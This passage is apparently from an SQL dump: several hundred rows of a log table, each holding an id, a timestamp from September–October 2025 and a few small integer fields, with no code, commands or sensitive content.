(20141, '2025-09-16 11:32:02', 1, 2054, 0, 1, 1),
(20142, '2025-09-16 11:34:07', 1, 2059, 0, 1, 1),
(20143, '2025-09-16 12:35:36', 1, 2064, 0, 1, 1),
(20144, '2025-09-16 13:08:17', 1, 2064, 0, 1, 1),
(20145, '2025-09-16 14:08:47', 1, 2054, 0, 1, 1),
(20146, '2025-09-16 15:07:37', 1, 2060, 0, 1, 1),
(20147, '2025-09-16 15:41:19', 1, 2064, 0, 1, 1),
(20148, '2025-09-16 15:55:46', 1, 2062, 0, 1, 1),
(20149, '2025-09-16 16:08:11', 1, 2061, 0, 1, 1),
(20150, '2025-09-16 17:46:57', 1, 2061, 0, 1, 1),
(20151, '2025-09-16 17:51:31', 1, 2060, 0, 1, 1),
(20152, '2025-09-16 18:05:56', 1, 2054, 0, 1, 1),
(20153, '2025-09-16 19:52:39', 1, 2054, 0, 1, 1),
(20154, '2025-09-16 19:52:47', 1, 2058, 0, 1, 1),
(20155, '2025-09-16 21:50:44', 1, 2061, 0, 1, 1),
(20156, '2025-09-16 22:04:35', 1, 2053, 0, 1, 1),
(20157, '2025-09-17 00:37:34', 1, 2061, 0, 1, 1),
(20158, '2025-09-17 00:40:01', 1, 2061, 0, 1, 1),
(20159, '2025-09-17 01:41:03', 1, 2058, 0, 1, 1),
(20160, '2025-09-17 01:55:18', 1, 2064, 0, 1, 1),
(20161, '2025-09-17 02:00:27', 1, 2059, 0, 1, 1),
(20162, '2025-09-17 03:03:27', 1, 2064, 0, 1, 1),
(20163, '2025-09-17 05:16:36', 1, 2059, 0, 1, 1),
(20164, '2025-09-17 05:27:37', 1, 2061, 0, 1, 1),
(20165, '2025-09-17 06:37:37', 1, 2053, 0, 1, 1),
(20166, '2025-09-17 07:34:10', 1, 2059, 0, 1, 1),
(20167, '2025-09-17 08:51:26', 1, 2064, 0, 1, 1),
(20168, '2025-09-17 09:14:43', 1, 2060, 0, 1, 1),
(20169, '2025-09-17 10:07:51', 1, 2064, 0, 1, 1),
(20170, '2025-09-17 12:34:55', 1, 2061, 0, 1, 1),
(20171, '2025-09-17 13:36:58', 1, 2060, 0, 1, 1),
(20172, '2025-09-17 13:38:00', 1, 2064, 0, 1, 1),
(20173, '2025-09-17 15:52:47', 1, 2060, 0, 1, 1),
(20174, '2025-09-17 16:13:49', 1, 2062, 0, 1, 1),
(20175, '2025-09-17 17:23:11', 1, 2054, 0, 1, 1),
(20176, '2025-09-17 18:17:06', 1, 2060, 0, 1, 1),
(20177, '2025-09-17 20:41:41', 1, 2062, 0, 1, 1),
(20178, '2025-09-17 20:57:27', 1, 2058, 0, 1, 1),
(20179, '2025-09-17 22:39:56', 1, 2059, 0, 1, 1),
(20180, '2025-09-17 23:10:30', 1, 2061, 0, 1, 1),
(20181, '2025-09-17 23:28:06', 1, 2060, 0, 1, 1),
(20182, '2025-09-18 00:59:11', 1, 2055, 0, 1, 1),
(20183, '2025-09-18 01:20:51', 1, 2063, 0, 1, 1),
(20184, '2025-09-18 06:31:16', 1, 2061, 0, 1, 1),
(20185, '2025-09-18 07:13:58', 1, 2064, 0, 1, 1),
(20186, '2025-09-18 08:06:52', 1, 2060, 0, 1, 1),
(20187, '2025-09-18 09:04:58', 1, 2064, 0, 1, 1),
(20188, '2025-09-18 10:06:20', 1, 2055, 0, 1, 1),
(20189, '2025-09-18 10:06:32', 1, 2064, 0, 1, 1),
(20190, '2025-09-18 10:07:14', 1, 2055, 0, 1, 1),
(20191, '2025-09-18 10:07:32', 1, 2064, 0, 1, 1),
(20192, '2025-09-18 10:09:07', 1, 2060, 0, 1, 1),
(20193, '2025-09-18 10:09:57', 1, 2060, 0, 1, 1),
(20194, '2025-09-18 10:12:46', 1, 2061, 0, 1, 1),
(20195, '2025-09-18 10:22:31', 1, 2064, 0, 1, 1),
(20196, '2025-09-18 10:24:55', 1, 2062, 0, 1, 1),
(20197, '2025-09-18 10:25:16', 1, 2063, 0, 1, 1),
(20198, '2025-09-18 10:25:26', 1, 2064, 0, 1, 1),
(20199, '2025-09-18 10:25:47', 1, 2062, 0, 1, 1),
(20200, '2025-09-18 10:26:03', 1, 2064, 0, 1, 1),
(20201, '2025-09-18 10:26:13', 1, 2058, 0, 1, 1),
(20202, '2025-09-18 10:28:58', 1, 2059, 0, 1, 1),
(20203, '2025-09-18 11:56:27', 1, 2061, 0, 1, 1),
(20204, '2025-09-18 13:43:25', 1, 2062, 0, 1, 1),
(20205, '2025-09-18 14:21:38', 1, 2054, 0, 1, 1),
(20206, '2025-09-18 14:22:50', 1, 2054, 0, 1, 1),
(20207, '2025-09-18 15:25:13', 1, 2062, 0, 1, 1),
(20208, '2025-09-18 17:53:03', 1, 2059, 0, 1, 1),
(20209, '2025-09-18 17:53:58', 1, 2059, 0, 1, 1),
(20210, '2025-09-18 18:01:27', 1, 2059, 0, 1, 1),
(20211, '2025-09-18 18:14:40', 1, 2053, 0, 1, 1),
(20212, '2025-09-18 19:46:51', 1, 2061, 0, 1, 1),
(20213, '2025-09-18 20:02:04', 1, 2061, 0, 1, 1),
(20214, '2025-09-18 23:51:41', 1, 2062, 0, 1, 1),
(20215, '2025-09-19 00:02:55', 1, 2064, 0, 1, 1),
(20216, '2025-09-19 01:14:59', 1, 2064, 0, 1, 1),
(20217, '2025-09-19 01:47:34', 1, 2053, 0, 1, 1),
(20218, '2025-09-19 06:01:34', 1, 2060, 0, 1, 1),
(20219, '2025-09-19 07:49:33', 1, 2063, 0, 1, 1),
(20220, '2025-09-19 09:33:23', 1, 2061, 0, 1, 1),
(20221, '2025-09-19 11:24:46', 1, 2061, 0, 1, 1),
(20222, '2025-09-19 15:22:53', 1, 2060, 0, 1, 1),
(20223, '2025-09-19 16:24:08', 1, 2061, 0, 1, 1),
(20224, '2025-09-19 16:37:37', 1, 2062, 0, 1, 1),
(20225, '2025-09-19 17:43:37', 1, 2064, 0, 1, 1),
(20226, '2025-09-19 18:52:20', 1, 2063, 0, 1, 1),
(20227, '2025-09-19 20:32:31', 1, 2060, 0, 1, 1),
(20228, '2025-09-19 21:00:51', 1, 2064, 0, 1, 1),
(20229, '2025-09-19 22:46:36', 1, 2061, 0, 1, 1),
(20230, '2025-09-19 22:46:39', 1, 2062, 0, 1, 1),
(20231, '2025-09-19 22:46:42', 1, 2063, 0, 1, 1),
(20232, '2025-09-20 01:50:19', 1, 2054, 0, 1, 1),
(20233, '2025-09-20 01:50:23', 1, 2054, 0, 1, 1),
(20234, '2025-09-20 04:42:33', 1, 2064, 0, 1, 1),
(20235, '2025-09-20 05:41:37', 1, 2061, 0, 1, 1),
(20236, '2025-09-20 06:36:40', 1, 2060, 0, 1, 1),
(20237, '2025-09-20 07:44:47', 1, 2061, 0, 1, 1),
(20238, '2025-09-20 08:09:03', 1, 2060, 0, 1, 1),
(20239, '2025-09-20 13:55:17', 1, 2063, 0, 1, 1),
(20240, '2025-09-20 14:00:52', 1, 2064, 0, 1, 1),
(20241, '2025-09-20 14:47:17', 1, 2063, 0, 1, 1),
(20242, '2025-09-20 14:47:20', 1, 2062, 0, 1, 1),
(20243, '2025-09-20 15:30:00', 1, 2062, 0, 1, 1),
(20244, '2025-09-20 15:47:32', 1, 2060, 0, 1, 1),
(20245, '2025-09-20 15:47:35', 1, 2059, 0, 1, 1),
(20246, '2025-09-20 16:18:06', 1, 2060, 0, 1, 1),
(20247, '2025-09-20 16:24:30', 1, 2063, 0, 1, 1),
(20248, '2025-09-20 16:59:19', 1, 2060, 0, 1, 1),
(20249, '2025-09-20 17:12:07', 1, 2063, 0, 1, 1),
(20250, '2025-09-20 17:23:59', 1, 2053, 0, 1, 1),
(20251, '2025-09-20 17:24:02', 1, 2061, 0, 1, 1),
(20252, '2025-09-20 17:44:59', 1, 2058, 0, 1, 1),
(20253, '2025-09-20 18:22:51', 1, 2058, 0, 1, 1),
(20254, '2025-09-20 18:23:50', 1, 2059, 0, 1, 1),
(20255, '2025-09-20 18:46:23', 1, 2055, 0, 1, 1),
(20256, '2025-09-20 20:16:53', 1, 2059, 0, 1, 1),
(20257, '2025-09-20 20:16:55', 1, 2058, 0, 1, 1),
(20258, '2025-09-20 20:20:54', 1, 2061, 0, 1, 1),
(20259, '2025-09-20 21:12:57', 1, 2062, 0, 1, 1),
(20260, '2025-09-20 22:56:06', 1, 2054, 0, 1, 1),
(20261, '2025-09-20 23:17:36', 1, 2059, 0, 1, 1),
(20262, '2025-09-20 23:35:23', 1, 2064, 0, 1, 1),
(20263, '2025-09-20 23:50:11', 1, 2061, 0, 1, 1),
(20264, '2025-09-21 00:12:24', 1, 2064, 0, 1, 1),
(20265, '2025-09-21 00:43:22', 1, 2060, 0, 1, 1),
(20266, '2025-09-21 01:32:27', 1, 2064, 0, 1, 1),
(20267, '2025-09-21 02:28:08', 1, 2062, 0, 1, 1),
(20268, '2025-09-21 03:12:12', 1, 2064, 0, 1, 1),
(20269, '2025-09-21 03:18:42', 1, 2063, 0, 1, 1),
(20270, '2025-09-21 03:58:36', 1, 2061, 0, 1, 1),
(20271, '2025-09-21 04:08:17', 1, 2055, 0, 1, 1),
(20272, '2025-09-21 04:41:27', 1, 2064, 0, 1, 1),
(20273, '2025-09-21 06:54:16', 1, 2060, 0, 1, 1),
(20274, '2025-09-21 06:54:18', 1, 2059, 0, 1, 1),
(20275, '2025-09-21 06:55:19', 1, 2060, 0, 1, 1),
(20276, '2025-09-21 07:27:44', 1, 2061, 0, 1, 1),
(20277, '2025-09-21 08:48:55', 1, 2060, 0, 1, 1),
(20278, '2025-09-21 09:19:33', 1, 2054, 0, 1, 1),
(20279, '2025-09-21 09:48:25', 1, 2060, 0, 1, 1),
(20280, '2025-09-21 09:59:06', 1, 2058, 0, 1, 1),
(20281, '2025-09-21 10:18:54', 1, 2054, 0, 1, 1),
(20282, '2025-09-21 11:49:02', 1, 2055, 0, 1, 1),
(20283, '2025-09-21 15:20:23', 1, 2062, 0, 1, 1),
(20284, '2025-09-21 16:05:56', 1, 2058, 0, 1, 1),
(20285, '2025-09-21 16:20:30', 1, 2064, 0, 1, 1),
(20286, '2025-09-21 19:50:20', 1, 2064, 0, 1, 1),
(20287, '2025-09-21 19:58:24', 1, 2058, 0, 1, 1),
(20288, '2025-09-21 20:07:37', 1, 2061, 0, 1, 1),
(20289, '2025-09-21 20:14:56', 1, 2064, 0, 1, 1),
(20290, '2025-09-21 20:22:35', 1, 2059, 0, 1, 1),
(20291, '2025-09-21 21:04:20', 1, 2061, 0, 1, 1),
(20292, '2025-09-21 21:18:25', 1, 2059, 0, 1, 1),
(20293, '2025-09-21 22:18:46', 1, 2061, 0, 1, 1),
(20294, '2025-09-21 22:22:58', 1, 2060, 0, 1, 1),
(20295, '2025-09-21 22:25:11', 1, 2054, 0, 1, 1),
(20296, '2025-09-21 22:56:06', 1, 2061, 0, 1, 1),
(20297, '2025-09-21 22:57:02', 1, 2061, 0, 1, 1),
(20298, '2025-09-22 00:26:51', 1, 2064, 0, 1, 1),
(20299, '2025-09-22 00:33:34', 1, 2061, 0, 1, 1),
(20300, '2025-09-22 00:58:58', 1, 2062, 0, 1, 1),
(20301, '2025-09-22 02:57:11', 1, 2064, 0, 1, 1),
(20302, '2025-09-22 03:18:46', 1, 2060, 0, 1, 1),
(20303, '2025-09-22 07:43:19', 1, 2055, 0, 1, 1),
(20304, '2025-09-22 08:17:11', 1, 2054, 0, 1, 1),
(20305, '2025-09-22 08:48:11', 1, 2062, 0, 1, 1),
(20306, '2025-09-22 08:50:11', 1, 2061, 0, 1, 1),
(20307, '2025-09-22 09:13:48', 1, 2064, 0, 1, 1),
(20308, '2025-09-22 09:13:50', 1, 2064, 0, 1, 1),
(20309, '2025-09-22 12:16:15', 1, 2063, 0, 1, 1),
(20310, '2025-09-22 12:33:35', 1, 2055, 0, 1, 1),
(20311, '2025-09-22 13:59:02', 1, 2064, 0, 1, 1),
(20312, '2025-09-22 15:19:45', 1, 2062, 0, 1, 1),
(20313, '2025-09-22 15:20:48', 1, 2064, 0, 1, 1),
(20314, '2025-09-22 16:50:29', 1, 2064, 0, 1, 1),
(20315, '2025-09-22 17:34:58', 1, 2058, 0, 1, 1),
(20316, '2025-09-22 17:59:58', 1, 2060, 0, 1, 1),
(20317, '2025-09-22 18:41:32', 1, 2061, 0, 1, 1),
(20318, '2025-09-22 19:03:20', 1, 2063, 0, 1, 1),
(20319, '2025-09-22 20:21:33', 1, 2059, 0, 1, 1),
(20320, '2025-09-22 20:33:39', 1, 2059, 0, 1, 1),
(20321, '2025-09-23 01:14:37', 1, 2061, 0, 1, 1),
(20322, '2025-09-23 01:51:43', 1, 2060, 0, 1, 1),
(20323, '2025-09-23 03:13:17', 1, 2061, 0, 1, 1),
(20324, '2025-09-23 04:25:28', 1, 2064, 0, 1, 1),
(20325, '2025-09-23 07:33:40', 1, 2061, 0, 1, 1),
(20326, '2025-09-23 09:26:20', 1, 2061, 0, 1, 1),
(20327, '2025-09-23 09:26:28', 1, 2054, 0, 1, 1),
(20328, '2025-09-23 09:38:25', 1, 2060, 0, 1, 1),
(20329, '2025-09-23 14:13:02', 1, 2064, 0, 1, 1),
(20330, '2025-09-23 15:26:03', 1, 2063, 0, 1, 1),
(20331, '2025-09-23 15:26:30', 1, 2063, 0, 1, 1),
(20332, '2025-09-23 15:26:36', 1, 2063, 0, 1, 1),
(20333, '2025-09-23 15:26:46', 1, 2063, 0, 1, 1),
(20334, '2025-09-23 15:26:55', 1, 2063, 0, 1, 1),
(20335, '2025-09-23 15:27:18', 1, 2063, 0, 1, 1),
(20336, '2025-09-23 15:27:40', 1, 2063, 0, 1, 1),
(20337, '2025-09-23 15:27:54', 1, 2063, 0, 1, 1),
(20338, '2025-09-23 15:28:10', 1, 2063, 0, 1, 1),
(20339, '2025-09-23 15:28:16', 1, 2063, 0, 1, 1),
(20340, '2025-09-23 15:28:19', 1, 2063, 0, 1, 1),
(20341, '2025-09-23 15:30:47', 1, 2063, 0, 1, 1),
(20342, '2025-09-23 15:41:25', 1, 2063, 0, 1, 1),
(20343, '2025-09-23 15:41:25', 1, 2063, 0, 1, 1),
(20344, '2025-09-23 15:41:26', 1, 2063, 0, 1, 1),
(20345, '2025-09-23 15:41:26', 1, 2063, 0, 1, 1),
(20346, '2025-09-23 15:53:36', 1, 2063, 0, 1, 1),
(20347, '2025-09-23 15:53:44', 1, 2063, 0, 1, 1),
(20348, '2025-09-23 20:00:59', 1, 2058, 0, 1, 1),
(20349, '2025-09-23 20:01:04', 1, 2054, 0, 1, 1),
(20350, '2025-09-23 20:55:51', 1, 2062, 0, 1, 1),
(20351, '2025-09-23 22:28:01', 1, 2060, 0, 1, 1),
(20352, '2025-09-23 23:56:08', 1, 2058, 0, 1, 1),
(20353, '2025-09-24 00:20:24', 1, 2064, 0, 1, 1),
(20354, '2025-09-24 00:35:23', 1, 2061, 0, 1, 1),
(20355, '2025-09-24 01:40:04', 1, 2060, 0, 1, 1),
(20356, '2025-09-24 04:06:53', 1, 2064, 0, 1, 1),
(20357, '2025-09-24 04:42:02', 1, 2061, 0, 1, 1),
(20358, '2025-09-24 05:06:44', 1, 2063, 0, 1, 1),
(20359, '2025-09-24 07:04:54', 1, 2058, 0, 1, 1),
(20360, '2025-09-24 07:22:46', 1, 2060, 0, 1, 1),
(20361, '2025-09-24 07:22:52', 1, 2064, 0, 1, 1),
(20362, '2025-09-24 13:35:53', 1, 2060, 0, 1, 1),
(20363, '2025-09-24 16:06:16', 1, 2062, 0, 1, 1),
(20364, '2025-09-24 19:31:44', 1, 2064, 0, 1, 1),
(20365, '2025-09-24 20:03:58', 1, 2064, 0, 1, 1),
(20366, '2025-09-24 20:19:12', 1, 2061, 0, 1, 1),
(20367, '2025-09-24 21:54:59', 1, 2061, 0, 1, 1),
(20368, '2025-09-25 00:16:19', 1, 2055, 0, 1, 1),
(20369, '2025-09-25 00:31:52', 1, 2059, 0, 1, 1),
(20370, '2025-09-25 03:23:11', 1, 2058, 0, 1, 1),
(20371, '2025-09-25 05:50:58', 1, 2064, 0, 1, 1),
(20372, '2025-09-25 06:05:45', 1, 2064, 0, 1, 1),
(20373, '2025-09-25 06:25:21', 1, 2060, 0, 1, 1),
(20374, '2025-09-25 06:42:57', 1, 2061, 0, 1, 1),
(20375, '2025-09-25 06:52:49', 1, 2053, 0, 1, 1),
(20376, '2025-09-25 07:35:01', 1, 2055, 0, 1, 1),
(20377, '2025-09-25 08:23:01', 1, 2060, 0, 1, 1),
(20378, '2025-09-25 08:23:12', 1, 2063, 0, 1, 1),
(20379, '2025-09-25 09:10:31', 1, 2061, 0, 1, 1),
(20380, '2025-09-25 13:32:27', 1, 2060, 0, 1, 1),
(20381, '2025-09-25 13:35:57', 1, 2064, 0, 1, 1),
(20382, '2025-09-25 17:44:29', 1, 2059, 0, 1, 1),
(20383, '2025-09-25 19:08:22', 1, 2059, 0, 1, 1),
(20384, '2025-09-25 19:47:36', 1, 2058, 0, 1, 1),
(20385, '2025-09-25 20:27:48', 1, 2061, 0, 1, 1),
(20386, '2025-09-25 20:37:06', 1, 2055, 0, 1, 1),
(20387, '2025-09-25 20:45:15', 1, 2054, 0, 1, 1),
(20388, '2025-09-25 21:12:13', 1, 2054, 0, 1, 1),
(20389, '2025-09-25 22:13:39', 1, 2058, 0, 1, 1),
(20390, '2025-09-25 22:33:16', 1, 2062, 0, 1, 1),
(20391, '2025-09-25 23:12:12', 1, 2060, 0, 1, 1),
(20392, '2025-09-25 23:57:46', 1, 2064, 0, 1, 1),
(20393, '2025-09-25 23:58:38', 1, 2061, 0, 1, 1),
(20394, '2025-09-26 00:50:45', 1, 2062, 0, 1, 1),
(20395, '2025-09-26 01:53:47', 1, 2053, 0, 1, 1),
(20396, '2025-09-26 03:13:55', 1, 2064, 0, 1, 1),
(20397, '2025-09-26 03:22:42', 1, 2063, 0, 1, 1),
(20398, '2025-09-26 03:44:12', 1, 2060, 0, 1, 1),
(20399, '2025-09-26 04:23:47', 1, 2063, 0, 1, 1),
(20400, '2025-09-26 04:43:17', 1, 2060, 0, 1, 1),
(20401, '2025-09-26 09:28:07', 1, 2062, 0, 1, 1),
(20402, '2025-09-26 10:18:58', 1, 2064, 0, 1, 1),
(20403, '2025-09-26 11:39:27', 1, 2063, 0, 1, 1),
(20404, '2025-09-26 12:00:50', 1, 2061, 0, 1, 1),
(20405, '2025-09-26 12:55:20', 1, 2060, 0, 1, 1),
(20406, '2025-09-26 13:22:24', 1, 2064, 0, 1, 1),
(20407, '2025-09-26 13:30:33', 1, 2060, 0, 1, 1),
(20408, '2025-09-26 13:56:11', 1, 2060, 0, 1, 1),
(20409, '2025-09-26 14:36:46', 1, 2062, 0, 1, 1),
(20410, '2025-09-26 16:29:02', 1, 2058, 0, 1, 1),
(20411, '2025-09-26 17:00:02', 1, 2063, 0, 1, 1),
(20412, '2025-09-26 20:41:26', 1, 2060, 0, 1, 1),
(20413, '2025-09-26 21:17:45', 1, 2061, 0, 1, 1),
(20414, '2025-09-26 21:34:19', 1, 2058, 0, 1, 1),
(20415, '2025-09-26 22:45:53', 1, 2063, 0, 1, 1),
(20416, '2025-09-26 22:45:58', 1, 2061, 0, 1, 1),
(20417, '2025-09-26 22:46:01', 1, 2062, 0, 1, 1),
(20418, '2025-09-26 22:54:40', 1, 2058, 0, 1, 1),
(20419, '2025-09-27 01:23:17', 1, 2061, 0, 1, 1),
(20420, '2025-09-27 01:42:56', 1, 2064, 0, 1, 1),
(20421, '2025-09-27 03:44:02', 1, 2058, 0, 1, 1),
(20422, '2025-09-27 03:53:22', 1, 2064, 0, 1, 1),
(20423, '2025-09-27 04:04:34', 1, 2059, 0, 1, 1),
(20424, '2025-09-27 05:07:29', 1, 2054, 0, 1, 1),
(20425, '2025-09-27 13:25:12', 1, 2064, 0, 1, 1),
(20426, '2025-09-27 13:37:50', 1, 2063, 0, 1, 1),
(20427, '2025-09-27 14:08:00', 1, 2062, 0, 1, 1),
(20428, '2025-09-27 14:17:23', 1, 2054, 0, 1, 1),
(20429, '2025-09-27 14:29:03', 1, 2060, 0, 1, 1),
(20430, '2025-09-27 14:37:23', 1, 2063, 0, 1, 1),
(20431, '2025-09-27 14:48:14', 1, 2061, 0, 1, 1),
(20432, '2025-09-27 14:58:53', 1, 2064, 0, 1, 1),
(20433, '2025-09-27 16:04:17', 1, 2062, 0, 1, 1),
(20434, '2025-09-27 18:14:08', 1, 2055, 0, 1, 1),
(20435, '2025-09-27 21:49:53', 1, 2054, 0, 1, 1),
(20436, '2025-09-27 22:03:37', 1, 2060, 0, 1, 1),
(20437, '2025-09-27 22:14:03', 1, 2061, 0, 1, 1),
(20438, '2025-09-27 23:34:31', 1, 2061, 0, 1, 1),
(20439, '2025-09-27 23:44:33', 1, 2061, 0, 1, 1),
(20440, '2025-09-27 23:44:43', 1, 2060, 0, 1, 1),
(20441, '2025-09-27 23:44:49', 1, 2064, 0, 1, 1),
(20442, '2025-09-28 00:40:23', 1, 2062, 0, 1, 1),
(20443, '2025-09-28 03:27:40', 1, 2060, 0, 1, 1),
(20444, '2025-09-28 03:49:02', 1, 2064, 0, 1, 1),
(20445, '2025-09-28 03:50:21', 1, 2064, 0, 1, 1),
(20446, '2025-09-28 04:00:01', 1, 2058, 0, 1, 1),
(20447, '2025-09-28 05:07:09', 1, 2059, 0, 1, 1),
(20448, '2025-09-28 05:26:46', 1, 2060, 0, 1, 1),
(20449, '2025-09-28 05:33:39', 1, 2064, 0, 1, 1),
(20450, '2025-09-28 05:58:59', 1, 2064, 0, 1, 1),
(20451, '2025-09-28 07:09:59', 1, 2060, 0, 1, 1),
(20452, '2025-09-28 07:14:17', 1, 2060, 0, 1, 1),
(20453, '2025-09-28 07:14:21', 1, 2059, 0, 1, 1),
(20454, '2025-09-28 08:00:49', 1, 2059, 0, 1, 1),
(20455, '2025-09-28 08:52:32', 1, 2058, 0, 1, 1),
(20456, '2025-09-28 09:35:03', 1, 2055, 0, 1, 1),
(20457, '2025-09-28 10:33:47', 1, 2060, 0, 1, 1),
(20458, '2025-09-28 11:20:30', 1, 2064, 0, 1, 1),
(20459, '2025-09-28 11:42:48', 1, 2055, 0, 1, 1),
(20460, '2025-09-28 13:30:52', 1, 2061, 0, 1, 1),
(20461, '2025-09-28 13:47:25', 1, 2064, 0, 1, 1),
(20462, '2025-09-28 13:47:42', 4, 2064, 3712, 1, 1),
(20463, '2025-09-28 13:48:22', 1, 2064, 3712, 1, 1),
(20464, '2025-09-28 13:48:38', 1, 2064, 3712, 1, 1),
(20465, '2025-09-28 15:27:41', 1, 2060, 0, 1, 1),
(20466, '2025-09-28 15:31:54', 1, 2053, 0, 1, 1),
(20467, '2025-09-28 15:34:55', 1, 2058, 0, 1, 1),
(20468, '2025-09-28 15:40:38', 1, 2054, 0, 1, 1),
(20469, '2025-09-28 15:40:43', 1, 2060, 0, 1, 1),
(20470, '2025-09-28 15:40:49', 4, 2060, 3713, 1, 1),
(20471, '2025-09-28 15:48:23', 1, 2060, 0, 1, 1),
(20472, '2025-09-28 15:58:29', 1, 2062, 0, 1, 1),
(20473, '2025-09-28 21:54:01', 1, 2054, 0, 1, 1),
(20474, '2025-09-28 21:54:49', 1, 2055, 0, 1, 1),
(20475, '2025-09-28 23:18:58', 1, 2059, 0, 1, 1),
(20476, '2025-09-28 23:24:00', 1, 2064, 0, 1, 1),
(20477, '2025-09-28 23:51:51', 1, 2054, 0, 1, 1),
(20478, '2025-09-29 00:55:23', 1, 2060, 0, 1, 1),
(20479, '2025-09-29 02:16:49', 1, 2061, 0, 1, 1),
(20480, '2025-09-29 03:05:43', 1, 2064, 0, 1, 1),
(20481, '2025-09-29 04:36:44', 1, 2055, 0, 1, 1),
(20482, '2025-09-29 05:49:06', 1, 2060, 0, 1, 1),
(20483, '2025-09-29 07:55:55', 1, 2061, 0, 1, 1),
(20484, '2025-09-29 08:52:58', 1, 2054, 0, 1, 1),
(20485, '2025-09-29 08:56:27', 1, 2064, 0, 1, 1),
(20486, '2025-09-29 09:02:25', 1, 2061, 0, 1, 1),
(20487, '2025-09-29 09:20:44', 1, 2061, 0, 1, 1),
(20488, '2025-09-29 10:02:22', 1, 2060, 0, 1, 1),
(20489, '2025-09-29 10:04:44', 1, 2055, 0, 1, 1),
(20490, '2025-09-29 11:10:01', 1, 2064, 0, 1, 1),
(20491, '2025-09-29 11:25:41', 1, 2058, 0, 1, 1),
(20492, '2025-09-29 11:58:03', 1, 2061, 0, 1, 1),
(20493, '2025-09-29 12:29:23', 1, 2064, 0, 1, 1),
(20494, '2025-09-29 12:31:10', 1, 2055, 0, 1, 1),
(20495, '2025-09-29 12:34:50', 1, 2059, 0, 1, 1),
(20496, '2025-09-29 13:37:42', 1, 2062, 0, 1, 1),
(20497, '2025-09-29 14:36:32', 1, 2060, 0, 1, 1),
(20498, '2025-09-29 15:35:32', 1, 2058, 0, 1, 1),
(20499, '2025-09-29 16:01:13', 1, 2062, 0, 1, 1),
(20500, '2025-09-29 16:59:15', 1, 2058, 0, 1, 1),
(20501, '2025-09-29 17:08:13', 1, 2063, 0, 1, 1),
(20502, '2025-09-29 17:41:51', 1, 2060, 0, 1, 1),
(20503, '2025-09-29 18:23:16', 1, 2064, 0, 1, 1),
(20504, '2025-09-29 18:25:29', 1, 2059, 0, 1, 1),
(20505, '2025-09-29 19:09:42', 1, 2060, 0, 1, 1),
(20506, '2025-09-29 21:18:29', 1, 2061, 0, 1, 1),
(20507, '2025-09-29 22:01:55', 1, 2063, 0, 1, 1),
(20508, '2025-09-29 22:18:50', 1, 2064, 0, 1, 1),
(20509, '2025-09-29 23:23:34', 1, 2061, 0, 1, 1),
(20510, '2025-09-29 23:34:33', 1, 2062, 0, 1, 1),
(20511, '2025-09-30 01:34:22', 1, 2063, 0, 1, 1),
(20512, '2025-09-30 02:21:21', 1, 2064, 0, 1, 1),
(20513, '2025-09-30 04:42:10', 1, 2054, 0, 1, 1),
(20514, '2025-09-30 05:16:47', 1, 2063, 0, 1, 1),
(20515, '2025-09-30 07:00:14', 1, 2053, 0, 1, 1),
(20516, '2025-09-30 07:44:10', 1, 2064, 0, 1, 1),
(20517, '2025-09-30 07:44:12', 1, 2064, 0, 1, 1),
(20518, '2025-09-30 09:31:17', 1, 2061, 0, 1, 1),
(20519, '2025-09-30 11:50:49', 1, 2064, 0, 1, 1),
(20520, '2025-09-30 12:05:45', 1, 2060, 0, 1, 1),
(20521, '2025-09-30 12:08:32', 1, 2061, 0, 1, 1),
(20522, '2025-09-30 12:18:40', 1, 2060, 0, 1, 1),
(20523, '2025-09-30 12:32:56', 1, 2064, 0, 1, 1),
(20524, '2025-09-30 12:47:33', 1, 2061, 0, 1, 1),
(20525, '2025-09-30 13:00:53', 1, 2061, 0, 1, 1),
(20526, '2025-09-30 13:03:32', 1, 2062, 0, 1, 1),
(20527, '2025-09-30 15:29:09', 1, 2053, 0, 1, 1),
(20528, '2025-09-30 15:45:29', 1, 2062, 0, 1, 1),
(20529, '2025-09-30 17:28:45', 1, 2060, 0, 1, 1),
(20530, '2025-09-30 17:59:09', 1, 2064, 0, 1, 1),
(20531, '2025-09-30 18:09:38', 1, 2063, 0, 1, 1),
(20532, '2025-09-30 19:07:58', 1, 2063, 0, 1, 1),
(20533, '2025-09-30 19:19:23', 1, 2061, 0, 1, 1),
(20534, '2025-09-30 19:29:04', 1, 2055, 0, 1, 1),
(20535, '2025-09-30 19:44:17', 1, 2054, 0, 1, 1),
(20536, '2025-09-30 19:52:52', 1, 2054, 0, 1, 1),
(20537, '2025-09-30 19:52:55', 1, 2058, 0, 1, 1),
(20538, '2025-09-30 23:22:16', 1, 2064, 0, 1, 1),
(20539, '2025-09-30 23:49:20', 1, 2059, 0, 1, 1),
(20540, '2025-10-01 00:06:23', 1, 2064, 0, 1, 1),
(20541, '2025-10-01 04:35:01', 1, 2060, 0, 1, 1),
(20542, '2025-10-01 05:57:06', 1, 2061, 0, 1, 1),
(20543, '2025-10-01 07:36:47', 1, 2064, 0, 1, 1),
(20544, '2025-10-01 07:46:53', 1, 2062, 0, 1, 1),
(20545, '2025-10-01 08:22:37', 1, 2060, 0, 1, 1),
(20546, '2025-10-01 12:07:42', 1, 2060, 0, 1, 1),
(20547, '2025-10-01 12:22:43', 1, 2058, 0, 1, 1),
(20548, '2025-10-01 13:17:19', 1, 2060, 0, 1, 1),
(20549, '2025-10-01 13:45:45', 1, 2060, 0, 1, 1),
(20550, '2025-10-01 15:08:45', 1, 2063, 0, 1, 1),
(20551, '2025-10-01 15:53:17', 1, 2062, 0, 1, 1),
(20552, '2025-10-01 17:33:36', 1, 2061, 0, 1, 1),
(20553, '2025-10-01 17:52:01', 1, 2054, 0, 1, 1),
(20554, '2025-10-01 17:57:00', 1, 2055, 0, 1, 1),
(20555, '2025-10-01 18:42:45', 1, 2064, 0, 1, 1),
(20556, '2025-10-01 18:53:05', 1, 2059, 0, 1, 1),
(20557, '2025-10-01 19:02:11', 1, 2058, 0, 1, 1),
(20558, '2025-10-01 19:15:26', 1, 2060, 0, 1, 1),
(20559, '2025-10-01 21:35:23', 1, 2064, 0, 1, 1),
(20560, '2025-10-01 21:54:44', 1, 2060, 0, 1, 1),
(20561, '2025-10-01 23:01:40', 1, 2060, 0, 1, 1),
(20562, '2025-10-02 00:53:55', 1, 2064, 0, 1, 1),
(20563, '2025-10-02 01:43:21', 1, 2064, 0, 1, 1),
(20564, '2025-10-02 03:33:12', 1, 2054, 0, 1, 1),
(20565, '2025-10-02 05:01:54', 1, 2059, 0, 1, 1),
(20566, '2025-10-02 05:31:49', 1, 2061, 0, 1, 1),
(20567, '2025-10-02 05:32:17', 1, 2064, 0, 1, 1),
(20568, '2025-10-02 05:32:19', 1, 2063, 0, 1, 1),
